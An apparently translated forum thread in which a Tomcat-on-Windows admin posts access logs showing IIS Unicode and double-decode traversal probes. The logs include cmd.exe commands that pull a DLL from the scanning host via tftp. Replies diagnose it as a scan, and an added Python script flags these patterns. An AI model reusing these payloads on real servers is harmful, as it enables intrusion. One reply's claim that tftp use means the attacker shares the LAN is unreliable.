Was my website successfully attacked?

My web server is Tomcat 4.1.8 (Win2000 SP3). Today I found the following records in the log file.
Could someone help me take a look at whether the attack succeeded? If it did, what vulnerability did they use? Does Tomcat also have a vulnerability similar to the IIS Unicode one,
and what settings do I need to make to guard against it? (I have already changed the password.)
Any advice would be appreciated. Thanks in advance!
218.5.3.98 - - [29/Jul/2003:19:52:31 8000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 -
218.5.3.98 - - [29/Jul/2003:19:52:31 8000] "GET /scripts/root.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 -
218.5.3.98 - - [29/Jul/2003:19:52:31 8000] "GET /scripts/httpodbc.dll HTTP/1.0" 200 -
218.5.3.98 - - [29/Jul/2003:19:52:31 8000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 -
218.5.3.98 - - [29/Jul/2003:19:52:31 8000] "GET /MSADC/root.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 -
218.5.3.98 - - [29/Jul/2003:19:52:31 8000] "GET /MSADC/httpodbc.dll HTTP/1.0" 200 -
218.5.3.98 - - [29/Jul/2003:19:52:31 8000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 -
218.5.3.98 - - [29/Jul/2003:19:52:31 8000] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 -
218.5.3.98 - - [29/Jul/2003:19:52:32 8000] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 -
218.5.3.98 - - [29/Jul/2003:19:52:32 8000] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 -
218.5.3.98 - - [29/Jul/2003:19:52:32 8000] "GET /c/httpodbc.dll HTTP/1.0" 200 -
218.5.3.98 - - [29/Jul/2003:19:52:32 8000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 -
218.5.3.98 - - [29/Jul/2003:19:52:32 8000] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 -
218.5.3.98 - - [29/Jul/2003:19:52:32 8000] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 -
218.5.3.98 - - [29/Jul/2003:19:52:32 8000] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 -
218.5.3.98 - - [29/Jul/2003:19:52:32 8000] "GET /d/httpodbc.dll HTTP/1.0" 200 -
218.5.3.98 - - [29/Jul/2003:19:52:33 8000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 -
218.5.3.98 - - [29/Jul/2003:19:52:33 8000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 -
218.5.3.98 - - [29/Jul/2003:19:52:33 8000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 -
218.5.3.98 - - [29/Jul/2003:19:52:33 8000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 -
218.5.3.98 - - [29/Jul/2003:19:52:33 8000] "GET /scripts/..%255c../httpodbc.dll HTTP/1.0" 200 -
218.5.3.98 - - [29/Jul/2003:19:52:33 8000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 -
218.5.3.98 - - [29/Jul/2003:19:52:33 8000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 -
218.5.3.98 - - [29/Jul/2003:19:52:33 8000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 -
218.5.3.98 - - [29/Jul/2003:19:52:34 8000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 -
218.5.3.98 - - [29/Jul/2003:19:52:34 8000] "GET /_vti_bin/..%255c../..%255c../..%255c../httpodbc.dll HTTP/1.0" 200 -
218.5.3.98 - - [29/Jul/2003:19:52:34 8000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 -
218.5.3.98 - - [29/Jul/2003:19:52:34 8000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 -
218.5.3.98 - -
---------------------------------------------------------------

Install SP4, apply the IIS patches, and install anti-virus software.
---------------------------------------------------------------

The following is my own analysis, for reference only:

Judging by the timing (29/Jul/2003:19:52:31 to 29/Jul/2003:19:52:35, only a few seconds) and the single source IP 218.5.3.98, you were scanned by a vulnerability scanner. The other side probably saw that your system is Windows and ran its default set of IIS vulnerability checks. So, going by these points alone, your system was not broken into, only scanned; this is preparation before an attack.

Changing your password was a very wise choice. However, the Tomcat server also seems to have quite a few vulnerabilities (such as the JSP source-code disclosure problem), so please watch out for those as well.
---------------------------------------------------------------
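
Editor's added example (not code from any reply in this thread): a small Python triage script that applies the reasoning of the analysis above to the log excerpt. It parses common-format access-log lines, percent-decodes the request path repeatedly so that the IIS double-decode sequence %255c collapses to a backslash, flags directory traversal, cmd.exe/root.exe invocation and tftp download attempts, and groups the flagged requests per client IP with the time span between first and last hit, so that a run of hits from one address within a couple of seconds stands out as scanner activity. It also collects the file names the attacker tried to write via tftp, which are the paths to look for on disk. The sample lines are copied from the post above plus one constructed benign request; the "8000" in the timestamp field is assumed to be a mangled time-zone offset and is ignored when parsing.

```python
"""Triage of the access-log excerpt above (editor's added example)."""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote

# Common log format as written by Tomcat's AccessLogValve / Apache.
# The timestamp's zone field is parsed loosely: the post shows "8000",
# assumed to be a mangled "+0800", so only the date/time part is used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)'
)

INDICATORS = {
    # "../" or "..\" after decoding: IIS Unicode / double-decode traversal
    "traversal": re.compile(r'\.\.[/\\]'),
    # cmd.exe, or the root.exe copy left behind by Code Red II / Nimda, run with /c
    "cmd_exec": re.compile(r'(cmd|root)\.exe\?/c\+', re.I),
    # tftp -i <source> GET <remote> <local>: pull a file onto the host
    "tftp_download": re.compile(
        r'tftp\s+-i\s+(?P<src>\d{1,3}(?:\.\d{1,3}){3})\s+get\s+(?P<remote>\S+)\s+(?P<local>\S+)',
        re.I),
    # direct request for the DLL the attacker tried to drop
    "dll_request": re.compile(r'/httpodbc\.dll$', re.I),
}


def decode_path(path, rounds=3):
    """Percent-decode repeatedly (bounded) so %255c -> %5c -> '\\' collapses
    the same way the IIS double-decode bug collapsed it."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def parse_line(line):
    """Parse one log line; returns None for lines that are not in common format."""
    line = line.strip().replace("\u201c", '"').replace("\u201d", '"')  # curly quotes from copy/paste
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["ts"].split()[0], "%d/%b/%Y:%H:%M:%S")
    rec["decoded"] = decode_path(rec["path"])
    rec["hits"] = [name for name, rx in INDICATORS.items() if rx.search(rec["decoded"])]
    t = INDICATORS["tftp_download"].search(rec["decoded"])
    rec["tftp"] = t.groupdict() if t else None
    return rec


def summarize(lines, burst_window=10, burst_min=5):
    """Group flagged requests per client IP. 'burst' is set when at least
    burst_min flagged requests arrive within burst_window seconds, the
    signature of an automated scanner rather than a hand-typed attack."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["hits"]:
            per_ip[rec["ip"]].append(rec)
    report = {}
    for ip, recs in per_ip.items():
        times = sorted(r["time"] for r in recs)
        span = (times[-1] - times[0]).total_seconds()
        report[ip] = {
            "count": len(recs),
            "span_seconds": span,
            "burst": len(recs) >= burst_min and span <= burst_window,
            "indicators": sorted({h for r in recs for h in r["hits"]}),
            "tftp_sources": sorted({r["tftp"]["src"] for r in recs if r["tftp"]}),
            "dropped_files": sorted({r["tftp"]["local"] for r in recs if r["tftp"]}),
            "statuses": sorted({r["status"] for r in recs}),
        }
    return report


# Sample input: lines copied from the post above (first one with the curly
# quotes exactly as pasted), plus one constructed benign request.
SAMPLE_LINES = [
    r'218.5.3.98 - - [29/Jul/2003:19:52:31 8000] “GET /scripts/root.exe?/c+dir HTTP/1.0“ 200 -',
    r'218.5.3.98 - - [29/Jul/2003:19:52:31 8000] "GET /scripts/root.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 -',
    r'218.5.3.98 - - [29/Jul/2003:19:52:31 8000] "GET /scripts/httpodbc.dll HTTP/1.0" 200 -',
    r'218.5.3.98 - - [29/Jul/2003:19:52:31 8000] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 -',
    r'218.5.3.98 - - [29/Jul/2003:19:52:33 8000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 -',
    r'218.5.3.98 - - [29/Jul/2003:19:52:33 8000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 -',
    r'218.5.3.98 - - [29/Jul/2003:19:52:33 8000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 -',
    r'10.0.0.5 - - [29/Jul/2003:19:55:02 8000] "GET /index.jsp HTTP/1.0" 200 1534',  # constructed, benign
]

if __name__ == "__main__":
    for ip, info in summarize(SAMPLE_LINES).items():
        print(ip, info)
```

Run it as a script to print the per-IP summary, or feed it a whole log with `summarize(open(path, encoding="latin-1"))`. The status code on its own says nothing about whether the command ran; what settles the question is whether the files named in `dropped_files` (httpodbc.dll, c:\httpodbc.dll and so on) actually exist on the server, which is the check the later replies recommend.
---------------------------------------------------------------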

I've never used Tomcat, so I don't know whether it has a Unicode-style vulnerability, but it looks like the attacker thought it did and tried to upload a file to gain higher privileges. It seems he didn't succeed, heh. You could look in the scripts directory to see whether there is any file he uploaded.
Also, is the original poster's IP also 218.5.3.*?
---------------------------------------------------------------

rdpwd.sys
ntkrnlmp.exe
ntkrpamp.exe
I'm not sure about these; the others are all present on my machine, so the system should be normal.
Another cmd.exe being generated is a very common phenomenon, but I can't explain the cause either. I used to suspect that intruders uploaded it by some means, and used many detection methods, even building a dedicated honeypot host, but I never found any clear sign.
I wonder whether anyone can offer some pointers.
---------------------------------------------------------------

Heh, there's no need to change the cmd under system32. It's a system file, and Microsoft protects these files; under \WINNT\SYSTEM32\DLLCACHE you'll find similarly protected copies. When you delete it under system32, the system automatically copies it back from the \WINNT\SYSTEM32\DLLCACHE cache, so you can't delete it. That's nothing to worry about; it's a normal file.
The other party merely used a vulnerability to call your cmd and tried to execute commands. If there is a problem, it's the vulnerability's problem, not cmd's.
The default IIS executable directory is inetpub\scripts\. The other party probably wanted to upload a DLL file to obtain administrator privileges; check whether he succeeded in uploading it.
He uploaded with tftp; if he didn't get that wrong, it means he's on the same LAN as you. You can look up which machine his IP belongs to and go find him directly, heh.

Categories: 服务器类 (Servers)